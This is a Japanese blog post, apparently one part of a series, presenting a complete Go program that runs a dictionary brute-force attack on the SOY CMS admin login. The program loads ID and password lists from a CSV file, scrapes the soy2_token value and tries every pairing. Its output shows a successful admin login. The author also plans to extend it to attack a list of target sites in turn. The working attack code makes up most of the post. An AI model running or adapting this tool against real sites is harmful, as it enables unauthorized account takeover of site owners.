SOY CMSに総当り攻撃を仕掛けてみる。その3では、コード内にパスワードリストを作って、そのリストに従ってログインのチェックを行った。

これだと、試したいものが膨大になるとその時点でコードの可読性が落ちる。


ということで、



IDとパスワードはCSVファイルにまとめて、総当たり攻撃を実行した時にCSVファイルを読み込んでログインのチェックを行うという処理に変更してみる。

※CSVファイルのエンコードはUTF-8での話です


前回のコードに太文字のコードを追加してみた。


package main

import (
	"bufio"
	"encoding/csv"
	"fmt"
	"io"
	"net/http"
	"net/url"
	"os"
	"regexp"
	"strings"
	"sync"
)

type Jar struct {
	lk      sync.Mutex
	cookies map[string][]*http.Cookie
}

func NewJar() *Jar {
	jar := new(Jar)
	jar.cookies = make(map[string][]*http.Cookie)
	return jar
}

func (jar *Jar) SetCookies(u *url.URL, cookies []*http.Cookie) {
	jar.lk.Lock()
	jar.cookies[u.Host] = cookies
	jar.lk.Unlock()
}

func (jar *Jar) Cookies(u *url.URL) []*http.Cookie {
	return jar.cookies[u.Host]
}

func main() {
	var token string

	//IDとパスワードを保存するための配列
	var ids []string
	var pws []string

	//IDとパスワードのリストを読み込む
	f, _ := os.Open("list.csv")
	defer f.Close()

	r := csv.NewReader(f)
	for {
		record, err := r.Read()
		//最後の行の場合は読み込みを終了
		if err == io.EOF {
			break
		}
		if len(record[0]) > 0 {
			ids = append(ids, record[0])
		}

		if len(record[1]) > 0 {
			pws = append(pws, record[1])
		}
	}

	jar := NewJar()
	client := http.Client{
		Jar: jar,
	}

	u := "http://example.com/cms/admin/"

	for _, user := range ids {
		//ヒットした場合はtrueにして、全体の処理を終了させる
		finished := false

		for _, pw := range pws {

			//ログインに成功したか?
			success := true

			resp, _ := client.Get(u)
			s := bufio.NewScanner(resp.Body)
			for s.Scan() {
				if hit := strings.Index(s.Text(), "soy2_token"); hit > 0 {
					re := regexp.MustCompile("value=\"(.*)\"")
					res := re.FindString(s.Text())
					res = strings.Replace(res, "value=", "", 1)
					token = strings.Trim(res, "\"")
				}
			}

			resp.Body.Close()
			params := url.Values{}
			params.Add("soy2_token", token)
			params.Add("Auth[name]", user)
			params.Add("Auth[password]", pw)

			resp, _ = client.PostForm(u, params)
			defer resp.Body.Close()
			s = bufio.NewScanner(resp.Body)
			for s.Scan() {

				if hit := strings.Index(s.Text(), "failed_message"); hit > 0 {
					fmt.Println("ログイン失敗")
					success = false
				}
			}

			if success == true {
				fmt.Println("ログイン成功")
				fmt.Println("ヒットしたID:", user, "Pw:", pw)
				finished = true
				break
			}
		}
		if finished == true {
			break
		}
	}
}

これで、登録したIDとパスワードを掛けあわせた分だけトライすることができるようになった。


それではこのコードを実行してみると、


$:~/ go run test.go
ログイン失敗
ログイン失敗
ログイン失敗
ログイン失敗
ログイン失敗
ログイン失敗
ログイン失敗
ログイン失敗
ログイン失敗
ログイン失敗
ログイン失敗
ログイン失敗
ログイン失敗
ログイン失敗
ログイン失敗
ログイン失敗
ログイン失敗
ログイン失敗
ログイン成功
ヒットしたID: admin Pw: ********

ヒットしたことが確認できた。

これでIDとパスワードの辞書を一度作成したら使いまわせるということになった。


あとはメモリーの使い方をもっとスリムにして、大量のパスワードを扱える様にする。


プログラムを実行するときに、対象サイトのURLも何らかの形で指定できる様にして、対象サイトリストを順に攻撃できる様にしたい。


あとは、今はログイン失敗で判定しているけど、ログイン成功での判定に変更したい。

等々やりたいことはたくさんあるけど、コードの作成はここらへんでやめておくことにする。